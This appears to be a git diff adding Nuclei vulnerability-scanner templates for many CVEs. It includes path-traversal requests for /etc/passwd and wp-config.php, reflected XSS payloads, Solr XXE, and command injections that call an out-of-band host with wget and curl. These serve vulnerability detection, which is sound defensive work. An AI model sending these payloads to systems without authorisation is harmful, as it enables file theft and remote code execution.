description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
reference: https://www.cvedetails.com/cve/CVE-2014-4940
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

29
cves/2014/CVE-2014-5368.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2014-5368
info:
name: WordPress Plugin WP Content Source Control - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
reference: |
- https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200

31
cves/2014/CVE-2014-8799.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-8799
info:
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
reference: |
- https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799
tags: cve,cve2014,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_USER"
- "DB_HOST"
part: body
condition: and
- type: status
status:
- 200

2
cves/2015/CVE-2015-2080.yaml
View File

@ -15,7 +15,7 @@ info:
requests:
- method: POST
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
headers:
Referer: \x00

31
cves/2015/CVE-2015-2807.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2015-2807
info:
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2015/CVE-2015-9414.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2015-9414
info:
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

5
cves/2016/CVE-2016-1000128.yaml
View File

@ -4,7 +4,10 @@ info:
name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
reference: |
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161
- https://wordpress.org/plugins/anti-plagiarism
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:

33
cves/2016/CVE-2016-1000139.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2016-1000139
info:
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
tags: cve,cve2016,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain);</script><"'
- 'input type="text" name="ContactId"'
condition: and
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000146.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000146
info:
name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2016/CVE-2016-1000148.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2016-1000148
info:
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
tags: cve,cve2016,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script><"'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000149.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000149
info:
name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000153.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000153
info:
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
cves/2016/CVE-2016-1000155.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2016-1000155
info:
name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2016/CVE-2016-10993.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2016-10993
info:
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://www.vulnerability-lab.com/get_content.php?id=1808
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
tags: cve,cve2016,wordpress,wp-theme,xss
requests:
- method: GET
path:
- "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
cves/2016/CVE-2016-2389.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2016-2389
info:
name: SAP xMII 15.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
reference: |
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- https://www.cvedetails.com/cve/CVE-2016-2389
tags: cve,cve2016,lfi,sap
requests:
- method: GET
path:
- "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

24
cves/2017/CVE-2017-12629.yaml
View File

@ -1,26 +1,36 @@
id: CVE-2017-12629
info:
name: Apache Solr <= 7.1 Remote Code Execution via SSRF
name: Apache Solr <= 7.1 XML entity injection
author: dwisiswant0
severity: critical
tags: cve,cve2017,solr,apache,rce,ssrf,oob
tags: cve,cve2017,solr,apache,oob,xxe
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
- https://twitter.com/honoki/status/1298636315613974532/photo/1
- https://twitter.com/honoki/status/1298636315613974532
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
requests:
- raw:
- |
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
- |
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "dns"
- "http"
extractors:
- type: regex
internal: true
name: core
group: 1
regex:
- '"name"\:"(.*?)"'

28
cves/2017/CVE-2017-14651.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2017-14651
info:
name: Reflected XSS - WSO2 Data Analytics Server
author: mass0ma
severity: medium
description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
tags: cve,cve2017,wso2,xss
requests:
- method: GET
path:
- "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=alert(document.domain)>"
- "Failed to add new collection"
part: body
condition: and
- type: word
words:
- "text/html"
part: header

40
cves/2017/CVE-2017-18024.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2017-18024
info:
name: AvantFAX 3.3.3 XSS
author: pikpikcu
severity: medium
reference: |
- https://hackerone.com/reports/963798
- http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-18024
description: |
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
tags: cve,cve2017,xss,avantfax
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin&_submit_check=1&jlbqg<script>alert("{{randstr}}")</script>b7g0x=1
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert("{{randstr}}")</script>'
- 'AvantFAX'
part: body
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"

5
cves/2017/CVE-2017-5487.yaml
View File

@ -33,3 +33,8 @@ requests:
- '"name":'
- '"avatar_urls":'
condition: and
extractors:
- type: regex
part: body
regex:
- '"name":"[^"]*"'

31
cves/2017/CVE-2017–4011.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-20174011
info:
name: McAfee NDLP User-Agent XSS
author: geeknik
severity: medium
description: McAfee Network Data Loss Prevention (NDLP) 9.3.x allows remote attackers to get session/cookie information via modification of the HTTP request.
reference:
- https://medium.com/@david.valles/cve-2017-4011-reflected-xss-found-in-mcafee-network-data-loss-prevention-ndlp-9-3-x-cf20451870ab
- https://kc.mcafee.com/corporate/index?page=content&id=SB10198
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011
tags: cve,cve2017,mcafee,xss
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"
- type: word
part: header
words:
- "text/html"

31
cves/2018/CVE-2018-10095.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-10095
info:
name: Dolibarr before 7.0.2 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-10095
tags: cve,cve2018,xss,dolibarr
requests:
- method: GET
path:
- "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

42
cves/2018/CVE-2018-10818.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-201810818
info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
reference: |
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
tags: cve,cve2018,lg-nas,rce,oob
requests:
- raw:
- |
POST /system/sharedir.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&uid=10; wget http://{{interactsh-url}}
- |
POST /en/php/usb_sync.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.58.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
&act=sync&task_number=1;wget http://{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200

30
cves/2018/CVE-2018-14013.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2018-14013
info:
name: Zimbra XSS
author: pikpikcu
severity: medium
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013
tags: cve,cve2018,xss,zimbra
requests:
- method: GET
path:
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

21
cves/2018/CVE-2018-15517.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2018-15517
info:
name: D-LINK Central WifiManager - SSRF
description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
reference:
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
author: gy741
severity: medium
tags: cve,cve2018,dlink,ssrf,oob
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

27
cves/2018/CVE-2018-15745.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-15745
info:
name: Argus Surveillance DVR - Directory Traversal
author: gy741
severity: high
description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
tags: cve,cve2018,argussurveillance,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "for 16-bit app support"
- "[drivers]"
condition: and

31
cves/2018/CVE-2018-16167.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-16167
info:
name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
reference: |
- https://www.exploit-db.com/exploits/49918
- https://nvd.nist.gov/vuln/detail/CVE-2018-16167
tags: cve,cve2018,logontracer,rce,oob
requests:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

27
cves/2018/CVE-2018-16288.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-16288
info:
name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
author: daffainfo
severity: high
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
reference: |
- https://www.exploit-db.com/exploits/45440
- https://www.cvedetails.com/cve/CVE-2018-16288
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2018/CVE-2018-19458.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-19458
info:
name: PHP Proxy 3.0.3 - Local File Inclusion
author: daffainfo
severity: high
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
reference: |
- https://www.exploit-db.com/exploits/45780
- https://www.cvedetails.com/cve/CVE-2018-19458
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?q=file:///etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

29
cves/2018/CVE-2018-20470.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2018-20470
info:
name: Sahi pro 7.x/8.x - Directory Traversal
author: daffainfo
severity: high
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
reference: |
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
- https://www.cvedetails.com/cve/CVE-2018-20470
tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body

2
cves/2018/CVE-2018-3810.yaml
View File

@ -18,7 +18,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

31
cves/2018/CVE-2018-5233.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2018-5233
info:
name: Grav CMS before 1.3.0 allows XSS.
author: pikpikcu
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233
tags: cve,cve2018,xss,grav
requests:
- method: GET
path:
- "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

47
cves/2019/CVE-2019-0193.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2019-0193
info:
name: Apache Solr - DataImportHandler RCE
description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
author: pdteam
severity: critical
refrense: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
- https://paper.seebug.org/1009/
tags: cve,cve2019,apache,rce,solr,oob
requests:
- raw:
- |
GET /solr/admin/cores?wt=json HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close
- |
POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
Host: {{Hostname}}
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
extractors:
- type: regex
internal: true
name: core
group: 1
regex:
- '"name"\:"(.*?)"'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200

2
cves/2019/CVE-2019-0221.yaml
View File

@ -7,6 +7,7 @@ info:
reference:
- https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119
description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,
@ -18,6 +19,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
- "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
matchers-condition: and
matchers:

29
cves/2019/CVE-2019-12276.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2019-12276
info:
name: GrandNode 4.40 - Path Traversal
author: daffainfo
severity: high
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
reference: |
- https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
headers:
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

14
cves/2019/CVE-2019-12616.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2019-12616
info:
name: phpMyAdmin CSRF
author: Mohammedsaneem
author: Mohammedsaneem,philippedelteil
description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
severity: medium
tags: cve,cve2019,phpmyadmin,csrf
@ -18,12 +18,18 @@ requests:
matchers-condition: and
matchers:
- type: word
words:
- "4.6.6deb4+deb9u2"
- "phpmyadmin.net"
- "phpMyAdmin"
condition: and
condition: or
- type: regex
regex:
- 'v=[1-4]\.[0-8]\.' # Fix in 4.9.0
- type: status
status:
- 200
- 200
- 401 #password protected

36
cves/2019/CVE-2019-16313.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 allows credential disclosure
author: pikpikcu
severity: high
description: ifw8 Router ROM v4.31 allows credential disclosure by reading the action/usermanager.htm HTML source code.
reference: |
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://nvd.nist.gov/vuln/detail/CVE-2019-16313
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/action/usermanager.htm'
matchers-condition: and
matchers:
- type: word
words:
- 'user'
- 'pwd'
part: body
